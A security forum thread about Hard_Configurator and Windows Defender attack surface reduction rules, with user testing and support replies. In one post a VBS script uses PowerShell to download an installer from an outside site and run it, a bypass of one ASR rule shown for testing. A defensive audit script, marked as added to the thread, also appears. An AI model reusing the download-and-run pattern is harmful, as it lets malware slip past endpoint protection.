Hard_Configurator - Windows Hardening Configurator

Discussion in 'System Utilities' started by Andy Ful, Dec 10, 2016.

  1. Av Gurus

    Av Gurus Level 28
    Trusted AV Tester

    Sep 22, 2014
    1,722
    10,659
    Testing security programs
    Earth
    Windows 10
    I set all of these options:
     
  2. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    I examined your settings. There is one option I cannot fully understand: 0-tolerance cloud blocking level. I thought that it had to block all unknown executables, but that is not the case when looking at your tests.
     
    ZeroDay and Av Gurus like this.
  3. Av Gurus

    Av Gurus Level 28
    Trusted AV Tester

    Sep 22, 2014
    1,722
    10,659
    Testing security programs
    Earth
    Windows 10
    I thought also, but it's not like that in RL.
     
    ZeroDay and Andy Ful like this.
  4. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    Here is the link to docs.microsoft.com article:
    Use Attack surface reduction rules to prevent malware infection
    It follows from it that ASR applies to:
    • Windows 10, version 1709 (and later)
    • Microsoft Office 365
    • Microsoft Office 2016
    • Microsoft Office 2013
    • Microsoft Office 2010
    The bad thing is that the ASR rule 'Impede JavaScript and VBScript to launch executables' also seems not to work outside Microsoft Office.
    After setting the ASR rules:
    Code:
    Set-MpPreference -AttackSurfaceReductionRules_Ids BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550,D4F940AB-401B-4EFC-AADC-AD5F3C50688A,3B576869-A4EC-4529-8536-B80A7769E899,75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84,D3E037E1-3EB8-44C8-A917-57927947596D,5BEB7EFE-FD9A-4556-801D-275E5FFC04CC,92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B -AttackSurfaceReductionRules_Actions Enabled,Enabled,Enabled,Enabled,Enabled,Enabled,Enabled
    I can still successfully run eso.exe via the simple RunEso.vbs script:
    Code:
    ' RunEso.vbs: launch an executable that is already on the disk via WScript.Shell
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run("c:\z\eso.exe")
    WScript.Quit
     
  5. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,259
    13,534
    Utopia
    How can the average user of Hard Config stay notified about new versions?
    I am on v. 3.1.0.0
     
    AtlBo, Andy Ful and Sunshine-boy like this.
  6. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,170
    5,186
    IRAN
    Windows 10
    ESET
  7. shmu26

    shmu26 Level 53

    Jul 3, 2015
    4,259
    13,534
    Utopia
    AtlBo, Andy Ful and Sunshine-boy like this.
  8. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    #328 Andy Ful, Dec 3, 2017
    Last edited: Dec 3, 2017
    In fact, the ASR rule 'Impede JavaScript and VBScript to launch executables' also has another, more appropriate description: 'Block JavaScript or VBScript from launching downloaded executable content'.
    So, it cannot block the script from executing files that are already on the disk, but it can block some script trojan downloaders. That feature works independently of Microsoft Office.
    The bad thing is that I managed to bypass this ASR rule using the VBS script trojan downloader:
    Code:
    Set WshShell = CreateObject("WScript.Shell")
    WshShell.Run("c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://kcsoftwares.com/files/sumo_lite.exe','C:\Users\Public\Downloads\sumo_lite.exe')")
    WScript.Sleep(10000)
    WshShell.Run("C:\Users\Public\Downloads\sumo_lite.exe")
    WScript.Quit
    The downloaded/executed file is a harmless SUMo lite installer from the developer site. The analogous script without using PowerShell is blocked by ASR (no file is downloaded).
    Poll - Who has already played with new W10 security features?
    :rolleyes:(n)
     
    AtlBo and ZeroDay like this.
  9. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    The problem is that Hard_Configurator does not look outside the computer (no external connections). I was thinking about adding a <Check for updates> button. That option could check for new versions of the program.:)
     
    AtlBo, ZeroDay, Daniel Keller and 3 others like this.
  10. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    I am working now on a Hard_Configurator extension, the tool to configure Windows Defender on Windows 10 FCU Home versions (ASR rules + exclusions). It contains the rules used by @Av Gurus (16 rules + ASR rules), but cannot be used on Windows Pro, because the PowerShell Set-MpPreference cmdlet used to apply those settings can be overridden by existing Defender Group Policy rules. I have to solve this issue, because this tool is far more convenient than using gpedit.msc.
     
  11. steel9

    steel9 Level 3

    Jun 23, 2017
    142
    398
    Sweden
    Windows 10
    F-Secure
    Any plans to release the source code on GitHub? I mean for people worried about downloading unsigned applications xD
     
    AtlBo likes this.
  12. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    #332 Andy Ful, Dec 5, 2017
    Last edited: Dec 5, 2017
    Here is the link:
    Hard_Configurator---old-versions/Hard_Configurator_3.1.0.0_sources.zip at master · AndyFul/Hard_Configurator---old-versions · GitHub
    The Hard_Configurator folder must be copied to the Windows folder!!! One can compile the executable manually using AutoIt - only the file Hard_Configurator.au3 has to be compiled, the rest is added during the compilation process.
    The code is not properly commented and is not optimized. It also uses some open-source functions made by the members of AutoIt Forums (Ascend4nt, Erik Pilsits, FredAI, Melba23, trancexx, Valuater).
     
    AtlBo, Daniel Keller, ZeroDay and 2 others like this.
  13. bribon77

    bribon77 Level 10

    Jul 6, 2017
    492
    3,399
    spain
    Windows 7
    Emsisoft
    #333 bribon77, Dec 9, 2017
    Last edited: Dec 9, 2017
    Hi, I installed Hard_Configurator. And I'm happy. It's a great tool.(y)
    I like this.
     
  14. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    You are welcome. Post here any questions. I am ready to answer, if the help files are not sufficient.:)
     
  15. bribon77

    bribon77 Level 10

    Jul 6, 2017
    492
    3,399
    spain
    Windows 7
    Emsisoft
    Thanks for the moment. Runs fine. If I have any questions, I'll let you know. Many thanks.:)
     
  16. Reldel1

    Reldel1 New Member

    Jun 12, 2017
    1
    2
    Melbourne, FL
    I've been following your work on Hard_Configurator for some time and have been using SRP on Pro versions of Windows since Vista days. My "mentor" with SRP was mechBgon, an early detailer of how to set up SRP. Never had any known malware since. While your work seems to be towards using H_C on Home versions, I was wondering if it is applicable for Pro versions as well? I was toying with trying it on a Pro version in place of my custom mechBgon installs. Would it work? Your thoughts.
     
    AtlBo and Sunshine-boy like this.
  17. Andy Ful

    Andy Ful Level 21

    Dec 23, 2014
    1,093
    4,690
    business
    Poland
    Windows 10
    Microsoft
    The SRP part of Hard_Configurator will work, but you have to reset SRP:
    1. Use gpedit.msc to remove SRP from GPO.
    2. If you configured SRP when not using Group Policies (SSRP or reg tweaks), then simply press the <Recommended SRP> button in Hard_Configurator.
    The problem with other GPO settings is that they are refreshed in the Registry every day. This can overwrite the Hard_Configurator settings. Simply look at the Hard_Configurator settings after a day or two. If any setting changes its value, then it is a sign that you already activated this setting in GPO. If so, then it should be set to the unconfigured state. If you have any problem, just post here.:)
     
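    An added audit script for the issue raised in posts 10 and 17 (not code from Hard_Configurator or from this thread): it reads the ASR rules applied locally with Set-MpPreference and compares them with the Group Policy values that override them on Windows Pro, so a rule that will be reverted by the daily policy refresh shows up as a conflict. It assumes the Exploit Guard policy registry path given in the comments and uses the seven rule GUIDs from post 4.

```powershell
# Added audit script, not part of Hard_Configurator. It compares the ASR rules
# applied locally with Set-MpPreference against the Group Policy values that
# override them on Windows Pro, so a setting silently reverted by the daily
# policy refresh shows up as a conflict. Run elevated on Windows 10 1709+.
$RuleIds = @(                                  # the seven GUIDs from the thread
    'BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550',
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A',
    '3B576869-A4EC-4529-8536-B80A7769E899',
    '75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84',
    'D3E037E1-3EB8-44C8-A917-57927947596D',
    '5BEB7EFE-FD9A-4556-801D-275E5FFC04CC',
    '92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B'
)
# Policy location written by gpedit.msc / GPO (assumed path, verify on your build):
# ExploitGuard_ASR_Rules = 1 turns the policy on; under ...\ASR\Rules each value is
# named by rule GUID and holds 0 (off), 1 (block) or 2 (audit).
$AsrPolicyKey   = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR'
$RulesPolicyKey = Join-Path $AsrPolicyKey 'Rules'
$ActionName     = @{ 0 = 'Disabled'; 1 = 'Enabled'; 2 = 'AuditMode' }

function Get-AsrRuleState {
    # Local (Set-MpPreference) state: parallel arrays of GUIDs and action codes.
    $pref  = Get-MpPreference
    $local = @{}
    $ids   = @($pref.AttackSurfaceReductionRules_Ids)
    for ($i = 0; $i -lt $ids.Count; $i++) {
        $local[$ids[$i].ToUpper()] = [int]$pref.AttackSurfaceReductionRules_Actions[$i]
    }
    # Policy state: only meaningful when the policy itself is switched on.
    $policy   = @{}
    $policyOn = (Test-Path $AsrPolicyKey) -and ((Get-ItemProperty $AsrPolicyKey).ExploitGuard_ASR_Rules -eq 1)
    if ($policyOn -and (Test-Path $RulesPolicyKey)) {
        foreach ($p in (Get-ItemProperty $RulesPolicyKey).PSObject.Properties) {
            if ($p.Name -match '^[0-9A-F-]{36}$') { $policy[$p.Name.ToUpper()] = [int]$p.Value }
        }
    }
    foreach ($id in $RuleIds) {
        $eff = $local[$id]; $pol = $policy[$id]
        [pscustomobject]@{
            RuleId   = $id
            Local    = if ($null -ne $eff) { $ActionName[$eff] } else { 'NotSet' }
            Policy   = if ($null -ne $pol) { $ActionName[$pol] } else { '-' }
            # A policy value for this rule other than 'Enabled' is what survives the next refresh.
            Conflict = $policyOn -and ($null -ne $pol) -and ($pol -ne 1)
        }
    }
}
Get-AsrRuleState | Format-Table -AutoSize
```

    Any row with Conflict = True is a rule that gpedit.msc should be set back to "Not Configured" for, as the post above recommends, before trusting the Hard_Configurator value.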
  18. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,170
    5,186
    IRAN
    Windows 10
    ESET
    I changed some settings in group policy and they didn't reset your tweaks! But if you touch the SRP then everything goes wrong:D
     
    AtlBo, Andy Ful and bribon77 like this.
  19. steel9

    steel9 Level 3

    Jun 23, 2017
    142
    398
    Sweden
    Windows 10
    F-Secure
    The x86 installer was detected as malware by multiple scanners. I submitted false positive reports to some of them, but according to Avast it was not a false positive.

    "
    Hello,

    Thank you for reporting this.

    Our virus specialists have confirmed that this detection is indeed correct due to lack of compliance with our clean software policy.

    You can find further details in the following article: Avast Clean Guidelines.


    With regards,

    Avast Customer Care
    "

    I asked them why, but they haven't responded yet.
     
    AtlBo and Andy Ful like this.
  20. Sunshine-boy

    Sunshine-boy Level 22

    Apr 1, 2017
    1,170
    5,186
    IRAN
    Windows 10
    ESET
    This is because Avast sucks! I remember once Avast detected PotPlayer updates as malware! Just remove that AV and install another one:D
     